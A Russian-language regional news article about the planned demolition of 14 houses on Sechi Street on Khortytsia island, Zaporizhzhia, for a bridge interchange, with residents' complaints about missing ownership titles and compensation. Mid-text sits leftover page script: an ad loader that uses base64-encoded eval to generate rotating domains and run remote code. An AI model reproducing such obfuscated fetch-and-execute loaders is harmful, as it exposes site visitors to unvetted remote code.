Как владельцы относятся к сносу домов ради строительства мостов в Запорожье

В Запорожье на улице Сечи должны снести 14 частных домов, чтобы построить транспортную развязку с выезда на новые мосты. Владельцы этих домов рассказали, как к этому относятся и то предпринимают местные власти.

Напомним, что речь идет о домах, расположенных на территории Национального Заповедника «Хортица». Интервью у их владельцев взяли журналисты «Суспільного«.

Какая позиция властей?

Так, представители инициативной группы жителей рассказали, что тяжелая техника приблизилась и работает рядом с поселком, а от власти нет информации о компенсации или переселении.

При этом указом Президента Украины еще в 2007 году Запорожскому городскому совету было поручено осуществить отселение людей, подпадающих в коридор застройки мостовых переходов. Но за 14 лет городские власти не выполнили тот пункт указа Президента.

По словам главы Запорожской ОГА Александра Старуха, нужно, чтобы был кадастровый номер, что земля была и это имущество зарегистрировано в установленном Законом порядке. К сожалению, этих трех составляющих на данный момент нет. Службой автомобильных дорог прорабатывается, вследствие того, что за 14 лет вопрос не решен, внести изменения в Законодательство действующего и пытаться решить другим путем.

Что думают по поводу отселения владельцы домов?

Житель дома № 33 на улице Сечи на острове Хортица Сергей Гайдаренко говорит, что живет «на чемоданах».

«Сейчас основная проблема в том, что представители Службы автомобильных дорог, как они говорят, не понимают, что нужно делать, как нужно поступить с людьми, как приобрести эти дома. Каким образом провести компенсацию или замену квадратных метров, или еще какой-либо алгоритм действий по к поселению. Не могут найти алгоритм действий из-за того, что у людей нет права собственности на дома», — рассказал Сергей.

Кроме того, на острове есть и те люди, которые прожили здесь всю жизнь. Например, Раиса Зоренко (женщина живет здесь с рождения) вспоминает, что поселение на острове Хортица появилось 70 лет назад. Дома возводили работники Центрального института механизации и электрификации животноводства с комплексом садов и ферм, который уже не работает:

«В ЦИМЕЖЕ мы работали, моя мама была начальницей станции. Мы были маленькие, папа работал на «Коксохиме» и возводили дом, как могли «лепили». И вот я 74 года здесь живу. Здесь живет мой племянник и моя дочь моя семь «.» var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Нина Одинцова живет в доме №13 по улице Сечи более полувека. Жилье досталось ей в наследство от прадеда. Другого жилья у нее нет, поэтому озвученная предварительная сумма компенсации от представителей Службы автодорог в области ее не устраивает.

«У нас есть такие люди, у кого хата завалилась, кто за все годы ничего ей не делал, а тогда так — во двор какую-то сумму посчитали, количество домов — ага — не важно, хороша она или завалилась. 13 млн на всю улицу. Если считать 14 домов – это получается по 26. Если 26 на три семьи, что же можно приобрести?”, – возмущается женщина.

Жительница 13-го дома Светлана Шелех добавляет: «У нас, в нашем адресе два дома с отдельными въездами, отдельными техническими паспортами. А нас считают одним домом (с нами проживает дочь с внуком)».

Сергей Гайдаренко говорит, что в Запорожском городском совете создать совместную рабочую группу обещали месяц назад в ноябре. К тому времени жители поселка выполнили необходимые условия – сделали новые технические паспорта. Каждому домовладению такое обновление документов обошлось около 3000 грн.

«И снова мы с новыми техническими паспортами сидим — ни новостей, ни никакой коммуникации», — говорит мужчина.

Также есть ответ на информационный запрос от Службы автомобильных дорог в Запорожской области, в котором говорится, что жильцы не имеют права собственности на данные жилые дома, ведь в технических паспортах БТИ они указаны как пользователи: «В сводном сметном расчете стоимости объекта строительства предусмотрены средства на снос зданий, которые находятся в зоне строительства, с учетом компенсационных выплат стоимости жилых домов, подлежащих сносу».

Также в Службе автомобильных дорог в Запорожской области сообщили, что могут проводить компенсационные выплаты владельцам недвижимого имущества, однако право собственности за пользователями жилых домов по ул. Сечи не зарегистрировано в Государственном реестре. (adsbygoogle = window.adsbygoogle || []).push({});

На Хортице снесут 14 домов, чтобы достроить мосты: что известно (ФОТО) Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/kak-vladeltsy-otnosyatsya-k-snosu-domov-radi-stroitelstva-mostov-v-zaporozhe/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top